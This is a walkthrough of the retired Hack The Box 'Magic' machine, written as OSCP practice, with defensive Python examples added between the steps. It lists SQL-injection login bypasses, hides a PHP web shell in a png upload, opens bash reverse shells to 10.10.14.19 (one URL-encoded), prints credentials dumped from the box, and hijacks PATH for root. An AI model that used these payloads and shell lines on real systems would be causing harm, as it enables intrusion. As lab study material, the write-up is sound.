OSCP PREPARATIONS – HTB Magic

Magic is a retired Hack The Box machine running Linux. We are expected to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to identify the services exposed by the target.
Classic scan

Full port scan

As a result of the port scan, 22/tcp (OpenSSH 7.6p1) and 80/tcp (Apache http) are open.
Let's enumerate port 80.

Here we enumerated the web application: we checked Wappalyzer and examined the page source, but the only notable thing was a login page.
We started a gobuster scan to detect hidden files and directories to see what might be lurking.
Gobuster scan

We did not get any results in the Gobuster scan.
Let's go to the login.php page.

Here comes the login screen; we looked at the source code etc. and did not see anything interesting. This is the form where we entered default credentials; they did not log us in, so we first try an SQL injection attack to break this login.
admin'or 1=1;-- -- --
admin'or'1=1;#
1'or'1'=1'))
admin'#
admin'-- -- --

One of these payloads let us log in successfully.
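As an added example (not code from the write-up), here is the pattern behind the login bypass above, shown with a constructed SQLite user table: the concatenated query accepts the comment-based payload (`admin'` followed by an SQL line comment), while the parameterised query treats the same input as an ordinary, non-matching username.

```python
import sqlite3

def make_demo_db():
    """Constructed sample user table; not the schema used by the Magic box."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0rrect-passw0rd')")
    return conn

def login_concat(conn, username, password):
    """Vulnerable pattern: the submitted values are spliced into the SQL text,
    so a closing quote followed by a line comment cuts the password check away."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_param(conn, username, password):
    """Hardened pattern: placeholders keep the values as data, so the same
    payload is compared against the username column and matches nothing."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

def compare(username, password):
    """Run both versions against the same credentials and report each outcome."""
    conn = make_demo_db()
    return {"concatenated": login_concat(conn, username, password),
            "parameterised": login_param(conn, username, password)}
```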

After logging in we reach an upload page.
Let's test the file upload area, which is handled by PHP code.
We tried creating an arbitrary file with touch and uploading it.

As far as we can tell, the upload only accepts jpg, jpeg and png files; let's see how to bypass the check.
First, let's add an additional extension to the file.
I decided to add png at the end.

Let's try adding png at the end.
filetest.php.png was accepted when I uploaded the file under that name. Next, let's add a PHP shell to a png file by placing it in the image's comment field.

Then we wrote php in front of the png extension so that this png file would be read as php, and uploaded it.

Let's browse to the directory where the file was uploaded.

Here we appended ?cmd=id to the URL and it returned the output of id.
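As an added example that is not part of the write-up, the following validator (function and sample names are my own) would have rejected the shell.php.png upload: it accepts only a plain base name with a single allowed extension, checks that the bytes start with that type's magic number, refuses any PHP open tag inside the image, and stores the file under a server-chosen name.

```python
import re
import secrets

# Magic bytes for the image types the upload form claims to accept.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# A plain base name with exactly one allowed extension; shell.php.png cannot match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpe?g)$", re.IGNORECASE)
# A PHP open tag anywhere in the bytes (e.g. inside a PNG text chunk or EXIF comment).
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

class UploadRejected(ValueError):
    pass

def validate_image_upload(filename: str, data: bytes) -> str:
    """Validate an upload and return a server-chosen storage name."""
    base = filename.rsplit("/", 1)[-1]                 # drop any path component
    if not SAFE_NAME.match(base):
        raise UploadRejected(f"unacceptable file name: {base!r}")
    ext = "." + base.rsplit(".", 1)[1].lower()
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match the declared image type")
    if PHP_TAG.search(data):
        raise UploadRejected("PHP open tag found inside image data")
    # Never reuse the client-supplied name; pick one the uploader cannot influence.
    return secrets.token_hex(8) + ext

def check(filename: str, data: bytes):
    """Convenience wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_image_upload(filename, data)
    except UploadRejected as exc:
        return False, str(exc)

# Constructed samples (not files from the machine): a bare PNG header, and the
# same header with a PHP open tag smuggled into a text chunk.
CLEAN_PNG = IMAGE_MAGIC[".png"] + b"\x00" * 16
TAINTED_PNG = IMAGE_MAGIC[".png"] + b"tEXtComment\x00<?php /* marker */ ?>"
```

The validator complements, not replaces, a web-server rule that never hands files under the upload directory to the PHP interpreter.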

I try to get it to give us a reverse shell with
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/4747 0>&1'
We used this command, but it did not work because of the spaces etc., so we URL-encoded it:
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
We sent the request and it worked.
This is how we got a shell.

In this shell we see that our privileges are limited, so we move on to local enumeration.

We did not find anything interesting with linpeas.sh, so we continue with manual local enumeration.

Here we obtained credentials from the db.php5 file.
theseus:iamkingtheseus
We tried to switch user with these credentials but could not log in; the password was incorrect.

Here we understand that MySQL is running locally; let's look at the listening network connections to confirm this.

We confirmed that port 3306 is listening.
When trying to connect to mysql, it said that there was no mysql client.

Here we typed mysql and pressed tab twice to see which mysql binaries are installed.

Here, after a little work with the show and dump utilities, we were able to get a dump of the database.

Here we obtained credentials:
theseus:Th3s3usW4sK1ng
Let's switch user using this password.

We have successfully obtained the user flag, but we still do not have root privileges.
So let's continue with local enumeration.

The /bin/sysinfo file gives information about the system.
In its MEM Usage section it runs the free command; we will manipulate this free command to run bash instead and try to get root privileges this way.

We couldn't get the output here.

I think the commands are getting mixed up, so I'll have it give me a reverse shell instead:
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I type the command.

This is how we got root privileges
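Added example, not the machine's code: an audit of the PATH a setuid helper like /bin/sysinfo inherits, flagging the entries that let an unprivileged user decide which `free` gets executed, next to the fixed environment such a program should use instead. The function names and the directories it builds are my own constructions.

```python
import os
import stat
import tempfile

# Directories a privileged program may search for helpers such as `free`.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")

def audit_path(path_env: str, trusted=TRUSTED_DIRS) -> list:
    """Return (entry, reason) for each PATH entry that hands control of an
    unqualified command name like `free` to whoever can write there."""
    findings = []
    for entry in path_env.split(":"):
        if entry in ("", "."):
            findings.append((entry, "searches the current directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry"))
        elif not os.path.isdir(entry):
            findings.append((entry, "missing directory"))
        elif os.stat(entry).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "group- or world-writable"))
        elif entry not in trusted:
            findings.append((entry, "not a trusted system directory"))
    return findings

def privileged_env(trusted=TRUSTED_DIRS) -> dict:
    """Environment a setuid helper should use instead of the caller's: a fixed
    PATH, with nothing inherited from the invoking user."""
    return {"PATH": ":".join(trusted)}

def demo() -> dict:
    """Constructed scenario: a world-writable directory placed ahead of the
    system directory, the precondition behind the sysinfo/free trick above."""
    with tempfile.TemporaryDirectory() as tmp:
        writable = os.path.join(tmp, "writable")
        os.mkdir(writable)
        os.chmod(writable, 0o777)
        clean = os.path.join(tmp, "clean")          # stands in for /usr/bin here
        os.mkdir(clean)
        os.chmod(clean, 0o755)
        inherited = f"{writable}:{clean}:.:"        # trailing ':' is an empty entry
        return {
            "inherited": audit_path(inherited, trusted=(clean,)),
            "hardened": audit_path(privileged_env(trusted=(clean,))["PATH"], trusted=(clean,)),
        }
```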
